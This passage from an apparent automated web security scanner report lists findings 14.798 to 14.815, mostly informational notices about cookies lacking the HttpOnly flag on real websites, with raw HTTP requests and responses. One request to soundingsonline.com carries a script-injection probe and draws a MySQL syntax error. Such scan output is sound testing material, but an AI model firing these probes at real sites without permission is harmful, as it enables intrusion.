  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:08:58 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:08:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 43482

<!-- dstolweb06-php5a --><!DOCTYPE html>
<html>
<head>
   <title>PWCs for Sale - Jet Ski, Sea Doo, Wave Runner and other Personal Watercraft - PWC-Traderonline.com</title>
   <meta http-equiv="Cache-Contr
...[SNIP]...

14.798. http://www.regattaregatta.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regattaregatta.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
  • currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.799. http://www.rochenhost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e2d0a354c26b66b66bc6f05a696c10dc=80669e412b6181bd9078e98c7bbdca20; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=80669e412b6181bd9078e98c7bbdca20; path=/
Last-Modified: Tue, 25 Jan 2011 00:09:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43499

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.800. http://www.rochenhost.com/joomla-hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rochenhost.com
Path:   /joomla-hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e2d0a354c26b66b66bc6f05a696c10dc=7d4ee1ec8dc4603d76d48b52c3e2104c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=7d4ee1ec8dc4603d76d48b52c3e2104c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43135

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.801. http://www.rockettheme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockettheme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>

...[SNIP]...

14.802. http://www.rvtraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rvtraderonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:09 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:08 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:09 GMT
Connection: close
Content-Type: text/html
Content-Length: 87669

<!-- dstolweb10-php5b --><!DOCTYPE html>
<html>
<head>
   <title>RV Trader.. - RVs - Fleetwood, Airstream, Winnebago, Keystone, Forest River, Newmar RVs and More - RVTrader.com</title>
   <meta http-equiv
...[SNIP]...

14.803. http://www.snowmobiletraderonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snowmobiletraderonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:18 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:17 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 45649

<!-- dstolweb07-php5b --><!DOCTYPE html>
<html>
<head>
   <title>Snowmobiles for Sale - Arctic Cat, Ski-Doo, and More - SnowmobileTraderOnline.com</title>
   <meta http-equiv="Cache-Control" content="no-c
...[SNIP]...

14.804. http://www.soundingsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.805. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

14.806. http://www.staples.com/ecoeasy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.staples.com
Path:   /ecoeasy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • zipcode=20001; expires=Mon, 20-Jan-2031 04:38:36 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecoeasy HTTP/1.1
Host: www.staples.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: IBM_HTTP_Server
Location: http://www.staples.com/sbd/cre/marketing/ecoeasy/index.html
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 25 Jan 2011 04:38:36 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=staples.com
Set-Cookie: zipcode=20001; expires=Mon, 20-Jan-2031 04:38:36 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present
Cache-Control: max-age=7200
Expires: Tue, 25 Jan 2011 06:38:36 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.staples.com/
...[SNIP]...

14.807. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:36 GMT
X-Varnish: 2659461572
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

14.808. http://www.thepointebrodiecreek.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thepointebrodiecreek.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • aa12208afb9625fd94ad3303695798d2=04f33c6a4636df9808d42509edf25600; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.thepointebrodiecreek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aa12208afb9625fd94ad3303695798d2=04f33c6a4636df9808d42509edf25600; path=/
Last-Modified: Tue, 25 Jan 2011 04:38:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.809. http://www.tradeonlytoday.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradeonlytoday.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • d4dad6935f632ac35975e3001dc7bbe8=l5185bjr0f1asmstu2ppbn0lg1; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.tradeonlytoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=l5185bjr0f1asmstu2ppbn0lg1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.810. http://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
  • manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:17 GMT
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

14.811. https://www.tuenti.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tuenti.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
  • manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 1611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

14.812. http://www.usaca.info/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usaca.info
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • 3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
  • ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

14.813. http://www.veoh.com/videodetails2.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /videodetails2.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videodetails2.swf HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/
Content-Length: 262
Date: Tue, 25 Jan 2011 04:39:36 GMT
Connection: close
Location: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=98

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.veoh.com/sta
...[SNIP]...

14.814. http://www.walnecks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walnecks.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:10:51 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.walnecks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:51 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:10:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 64629

<!-- dstolweb11-php5b --><!DOCTYPE html>
<html>
<head>
   <title>Classic Motorcycles - Antique and Vintage Motorcycles for Sale - Walnecks.com</title>
   <meta http-equiv="Cache-Control" content="no-cache
...[SNIP]...

14.815. http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /learn/articles-resources/community-support/recycling.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
  • TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
  • TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
  • DYN_USER_ID=3531123409; path=/
  • DYN_USER_CONFIRM=2afae30a32d18177a2afef4e6b409767; path=/
  • ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
  • browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
  • BIGipServerpWL_7010_7011=1776406919.25115.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /learn/articles-resources/community-support/recycling.jsp HTTP/1.1
Host: www.wireless.att.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV"
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xcDMgWyBEUFNMaWNlbnNlLzAgIF0=
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 04:40:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:40:25 GMT
